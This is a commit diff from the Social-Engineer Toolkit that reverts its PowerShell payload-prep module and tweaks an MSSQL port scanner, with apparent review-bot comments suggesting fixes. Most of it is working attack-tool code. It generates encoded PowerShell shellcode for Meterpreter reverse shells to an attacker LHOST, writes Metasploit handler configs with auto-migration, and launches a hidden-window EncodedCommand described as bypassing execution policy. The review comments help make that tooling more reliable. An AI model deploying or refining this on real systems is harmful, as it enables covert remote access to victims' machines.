multiple fixes for powershell injection

This commit is contained in:
TrustedSec 2016-08-01 20:12:15 -04:00
parent c6daf7e063
commit a4e6408170
9 changed files with 206 additions and 187 deletions


@ -1,3 +1,10 @@
~~~~~~~~~~~~~~~~
version 7.3.7
~~~~~~~~~~~~~~~~
* replaced powershell prep with the old one - it broke almost all powershell injection in SET
* fixed an issue that would cause scanner to continue to scan even when port not discovered (function issue)
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
version 7.3.6 version 7.3.6
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~


@ -113,8 +113,8 @@ try:
for ip in range1: for ip in range1:
sqlport = get_sql_port(ip) sqlport = get_sql_port(ip)
if sqlport == None: if sqlport == None:
sql_nmap_scan(ip) nmapscan = sql_nmap_scan(ip)
if sql_nmap_scan != "": if nmapscan != "":
sql_servers = sql_servers + \ sql_servers = sql_servers + \
ip + ":" + "1433" + "," ip + ":" + "1433" + ","
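Review bot: The new guard `if nmapscan != "":` only recognises an empty-string miss, so if `sql_nmap_scan` signals "no port found" by returning None (e.g. by falling off the end of the function) the comparison is still True and the host is appended to `sql_servers` on 1433 — the scanner keeps going, which is exactly what the changelog says this commit fixes. The return contract of `sql_nmap_scan` is not visible in this hunk, so confirm it; a truthiness test `if nmapscan:` covers both None and "". While here, `if sqlport == None:` should be `if sqlport is None:`. The enclosing `for ip in range1:` loop and its `try:` start outside the hunk.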


@ -10,7 +10,6 @@ import base64
from src.core.setcore import * from src.core.setcore import *
from src.core.menu.text import * from src.core.menu.text import *
from src.core.dictionaries import * from src.core.dictionaries import *
from src.payloads.powershell.prep import prep_powershell_payload
try: try:
if len(check_options("IPADDR=")) > 2: if len(check_options("IPADDR=")) > 2:
@ -600,7 +599,10 @@ try:
if setshell_counter == 0: if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (setdir)): if os.path.isfile("%s/web_clone/index.html" % (setdir)):
prep_powershell_payload() try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (setdir)): if os.path.isfile("%s/x86.powershell" % (setdir)):
fileopen1 = open( fileopen1 = open(
"%s/x86.powershell" % (setdir), "r") "%s/x86.powershell" % (setdir), "r")
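Review bot: The bare `except:` below `core.module_reload(src.payloads.powershell.prep)` also catches anything the prep module raises while its body runs (including KeyboardInterrupt at the prompts it can issue), and the fallback `import` re-executes nothing for a module that is already loaded, so the following `os.path.isfile("%s/x86.powershell" % (setdir))` check can silently pick up a stale payload from an earlier run. Narrow it to the case the fallback exists for, `except (NameError, AttributeError):`, so genuine prep failures surface. This file only shows `from src.core.setcore import *`, so whether `core` is bound here is not visible in the hunk — verify. The enclosing `try:` block starts outside the hunk.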


@ -1 +1 @@
7.3.6 7.3.7


@ -1762,7 +1762,7 @@ def get_sql_port(host):
# Build the socket with a .1 second timeout # Build the socket with a .1 second timeout
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(.1) s.settimeout(.3)
# Attempt to query UDP:1434 and return MSSQL running port # Attempt to query UDP:1434 and return MSSQL running port
try: try:
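Review bot: The comment `# Build the socket with a .1 second timeout` two lines above is now stale: the new side raises the value to `s.settimeout(.3)` and the comment still says .1. Either update it to `# Build the socket with a .3 second timeout` (presumably 0.1 s was too short for the UDP:1434 reply — the commit does not say, so word it accordingly) or hoist the value into a named constant such as `SQL_BROWSER_TIMEOUT = 0.3` so the comment cannot drift again. The body of `get_sql_port` continues outside the hunk.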


@ -8,7 +8,6 @@ import subprocess
import time import time
import src.core.setcore as core import src.core.setcore as core
import impacket.tds as tds import impacket.tds as tds
from src.payloads.powershell.prep import prep_powershell_payload
#from src.core.payloadgen import create_payloads #from src.core.payloadgen import create_payloads
@ -173,7 +172,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
if choice1 == "1": if choice1 == "1":
web_path = None web_path = None
prep_powershell_payload()
#prep_powershell_payload()
# if we are using a SET interactive shell payload then we need to make # if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set # the path under web_clone versus ~./set
@ -245,20 +245,20 @@ def deploy_hex2binary(ipaddr, port, username, password):
filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
filewrite.close() filewrite.close()
#try: try:
# core.module_reload(src.payloads.powershell.prep) core.module_reload(src.payloads.powershell.prep)
#except: except:
# import src.payloads.powershell.prep import src.payloads.powershell.prep
# launch powershell # launch powershell
prep_powershell_payload() #prep_powershell_payload()
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell")) os.makedirs(os.path.join(core.setdir + "reports/powershell"))
#with open(os.path.join(core.setdir + "x86.powershell")) as x86: #with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = file(core.setdir + "x86.powershell").read() x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read() # x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
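Review bot: Inside `deploy_hex2binary` the fallback `import src.payloads.powershell.prep` makes `src` a local name of the function, so the preceding `core.module_reload(src.payloads.powershell.prep)` raises UnboundLocalError on every call, the bare `except:` swallows it, and only the import runs; after the first deployment in a process the module is already in sys.modules, the import re-executes nothing, and a second deployment reuses the previous x86.powershell instead of regenerating it. Import the module once at file scope, `import src.payloads.powershell.prep as prep`, and reduce the block to `core.module_reload(prep)` with no try/except. The line `x86 = file(core.setdir + "x86.powershell").read().rstrip()` also relies on the Python 2-only `file()` builtin and never closes the handle; `with open(os.path.join(core.setdir, "x86.powershell")) as fh: x86 = fh.read().rstrip()` fixes both. The commented-out `#prep_powershell_payload()` lines are dead now that the import was removed and should be deleted.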


@ -8,7 +8,6 @@ import os
import subprocess import subprocess
import src.core.setcore as core import src.core.setcore as core
from src.payloads.powershell.prep import prep_powershell_payload
# Py2/3 compatibility # Py2/3 compatibility
# Python3 renamed raw_input to input # Python3 renamed raw_input to input
@ -75,7 +74,12 @@ try:
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
prep_powershell_payload() #prep_powershell_payload()
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
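Review bot: `#prep_powershell_payload()` is left as a commented-out call directly above the new `try:` even though this same commit removes the import it referred to; delete it rather than keep dead code. The bare `except:` under `core.module_reload(src.payloads.powershell.prep)` should be `except (NameError, AttributeError):` — as written it also hides an exception thrown by the prep module itself, after which execution proceeds to the reports/powershell directory setup as if the payload had been generated. The enclosing `try:` starts outside the hunk.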


@ -1,201 +1,203 @@
#!/usr/bin/env python #!/usr/bin/env python
# coding=utf-8 import sys
import os import subprocess
import re import re
import os
import time import time
from src.core.setcore import *
import src.core.setcore as core # grab stage encoding flag
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# Py2/3 compatibility # check to see if we are just generating powershell code
# Python3 renamed raw_input to input powershell_solo = check_options("POWERSHELL_SOLO")
try:
input = raw_input
except NameError:
pass
def prep_powershell_payload(): # check if port is there
port = check_options("PORT=")
# grab stage encoding flag # check if we are using auto_migrate
stage_encoding = core.check_config("STAGE_ENCODING=").lower() auto_migrate = check_config("AUTO_MIGRATE=")
if stage_encoding == "off":
stage_encoding = "false" # check if we are using pyinjection
pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(setdir + "/payload_options.shellcode"):
pyinjection = "on"
print_status(
"Multi/Pyinjection was specified. Overriding config options.")
else: else:
stage_encoding = "true" pyinjection = "off"
# check to see if we are just generating powershell code # grab ipaddress
powershell_solo = core.check_options("POWERSHELL_SOLO") if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check if port is there # check to see if we are using multi powershell injection
port = core.check_options("PORT=") multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
# check if we are using auto_migrate # turn off multi injection if pyinjection is specified
auto_migrate = core.check_config("AUTO_MIGRATE=") if pyinjection == "on":
multi_injection = "off"
# check if we are using pyinjection # check what payloads we are using
pyinjection = core.check_options("PYINJECTION=") powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
pyinjection = "on"
core.print_status("Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress # if we specified a hostname then default to reverse https/http
if core.check_options("IPADDR=") != 0: if validate_ip(ipaddr) == False:
ipaddr = core.check_options("IPADDR=") powershell_inject_x86 = "windows/meterpreter/reverse_http"
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
core.update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection # prompt what port to listen on for powershell then make an append to the current
multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() # metasploit answer file
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# turn off multi injection if pyinjection is specified # if we have multi injection on, don't worry about these
if pyinjection == "on": if multi_injection != "on":
multi_injection = "off" if pyinjection == "off":
print_status(
# check what payloads we are using "POWERSHELL_INJECTION is set to ON with multi-pyinjector")
powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
# if we specified a hostname then default to reverse https/http if port == "":
if not core.validate_ip(ipaddr):
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443" port = "443"
with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")
data = fileopen.read() data = fileopen.read()
match = re.search(port, data) match = re.search(port, data)
if not match: if not match:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: filewrite = open(
filewrite.write("\nuse exploit/multi/handler\n") "%s/meta_config_multipyinjector" % (setdir), "a")
if auto_migrate == "ON": filewrite.write("\nuse exploit/multi/handler\n")
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") if auto_migrate == "ON":
filewrite.write("set PAYLOAD {0}\n" filewrite.write(
"set LHOST {1}\n" "set AutoRunScript post/windows/manage/smart_migrate\n")
"set LPORT {2}\n" filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" %
"set EnableStageEncoding {3}\n" (powershell_inject_x86, ipaddr, port, stage_encoding))
"set ExitOnSession false\n" filewrite.close()
"exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))
# if we have multi injection on, don't worry about these # if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off": if multi_injection != "on":
if pyinjection == "off":
# check to see if the meta config multi pyinjector is there # check to see if the meta config multi pyinjector is there
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
if core.check_options("PORT=") != 0: if check_options("PORT=") != 0:
port = core.check_options("PORT=") port = check_options("PORT=")
# if port.options isnt there then prompt # if port.options isnt there then prompt
else: else:
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) port = input(setprompt(
if not port: ["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443" port = "443"
core.update_options("PORT={0}".format(port)) update_options("PORT=" + port)
# turn off multi_injection if we are riding solo from the powershell menu # turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON": if powershell_solo == "ON":
multi_injection = "off" multi_injection = "off"
pyinjection = "on" pyinjection = "on"
# if we are using multi powershell injection # if we are using multi powershell injection
if multi_injection == "on" and pyinjection == "off": if multi_injection == "on":
core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") if pyinjection == "off":
print_status(
"Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable # define a base variable
x86 = "" x86 = ""
# specify a list we will use for later # specify a list we will use for later
multi_injection_x86 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status(
"Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
port_check = check_ports(
"%s/meta_config_multipyinjector" % (setdir), ports)
if port_check == False:
filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (setdir)):
filewrite = open("%s/meta_config" % (setdir), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/meta_config" % (setdir), ports)
if port_check == False:
filewrite = open("%s/meta_config" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
multi_injection_x86 = "" multi_injection_x86 = ""
# read in the file we need for parsing
# here we do some funky loops so we don't need to rewrite the code below fileopen = open(setdir + "/payload_options.shellcode", "r")
if multi_injection == "on": payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
port = core.check_config("POWERSHELL_MULTI_PORTS=") payloads = payloads.split(",")
port = port.split(",") # format: payload<space>port
for payload in payloads:
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports:
core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set LPORT {3}\n"
"set ExitOnSession false\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# if we aren't using multi pyinjector
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if meta config isn't created yet then create it
if not os.path.isfile():
with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
filewrite.write("")
port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
if not port_check:
with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding {2}\n"
"set ExitOnSession false\n"
"set LPORT {3}\n"
"exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
injections = []
# read in the file we need for parsing
with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port # format: payload<space>port
for payload in payloads: payload = payload.split(" ")
# format: payload<space>port powershell_inject_x86 = payload[0]
payload = payload.split(" ") port = payload[1]
powershell_inject_x86 = payload[0] print_status("Generating x86-based powershell injection code...")
port = payload[1] multi_injection_x86 = multi_injection_x86 + "," + \
core.print_status("Generating x86-based powershell injection code...") generate_powershell_alphanumeric_payload(
injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) powershell_inject_x86, ipaddr, port, x86)
multi_injection_x86 = ",".join(injections)
# if its turned to off # if its turned to off
if multi_injection == "off" and pyinjection == "off": if multi_injection == "off":
core.print_status("Generating x86-based powershell injection code...") if pyinjection == "off":
x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection # if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on": if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user # check to see if we want to display the powershell command to the user
verbose = core.check_config("POWERSHELL_VERBOSE=") verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on": if verbose.lower() == "on":
core.print_status("Printing the x86 based encoded code...") print_status("Printing the x86 based encoded code...")
time.sleep(3) time.sleep(3)
print(x86) print(x86)
#with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: filewrite = open("%s/x86.powershell" % (setdir), "w")
filewrite = open(core.setdir + "/x86.powershell", "w") filewrite.write(x86)
filewrite.write(x86) filewrite.close()
filewrite.close() print_status("Finished generating powershell injection bypass.")
core.print_status("Finished generating powershell injection bypass.") print_status("Encoded to bypass execution restriction policy...")
core.print_status("Encoded to bypass execution restriction policy...")
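Review bot: In the restored module, `match = re.search(port, data)` on the meta_config_multipyinjector contents treats the user-entered port as an unescaped regex and matches it as a substring anywhere in the file, so entering 44 when a handler on 443 already exists (or a port whose digits occur in the `set LHOST` address) finds a match and the `use exploit/multi/handler` block for the new port is never appended. The file already has the right tool in the multi-port branch, `check_ports("%s/meta_config_multipyinjector" % (setdir), ports)`; use it here too, `if not check_ports("%s/meta_config_multipyinjector" % (setdir), port):`. The handles opened with `fileopen = open(..., "r")` for meta_config_multipyinjector and payload_options.shellcode are never closed, whereas the function version being replaced used `with`. This is a module-level script re-executed through `core.module_reload`, so every prompt and file write runs at import time; the hunk covers the whole file.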

View file

@ -12,7 +12,6 @@ import subprocess
import src.core.setcore as core import src.core.setcore as core
from src.core.menu import text from src.core.menu import text
from src.payloads.powershell.prep import prep_powershell_payload
# Py2/3 compatibility # Py2/3 compatibility
# Python3 renamed raw_input to input # Python3 renamed raw_input to input
@ -43,7 +42,12 @@ if powershell_menu_choice != "99":
with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: with open(core.setdir + "/payload_options.shellcode", "w") as filewrite:
filewrite.write("windows/meterpreter/reverse_tcp {},".format(port)) filewrite.write("windows/meterpreter/reverse_tcp {},".format(port))
prep_powershell_payload() try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
#prep_powershell_payload()
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.setdir + "/reports/powershell"):
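Review bot: The bare `except:` after `core.module_reload(src.payloads.powershell.prep)` also catches KeyboardInterrupt, so a Ctrl-C at one of the prompts the prep module can issue while it is being (re)executed lands in the fallback `import` and the menu carries on as if a payload had been written. Narrow it to `except (NameError, AttributeError):`, the only condition the fallback is meant for (`import src.core.setcore as core` binds `core`, not `src`). The trailing `#prep_powershell_payload()` is dead code once this commit removes the import and should go. The enclosing `if powershell_menu_choice != "99":` block starts outside the hunk.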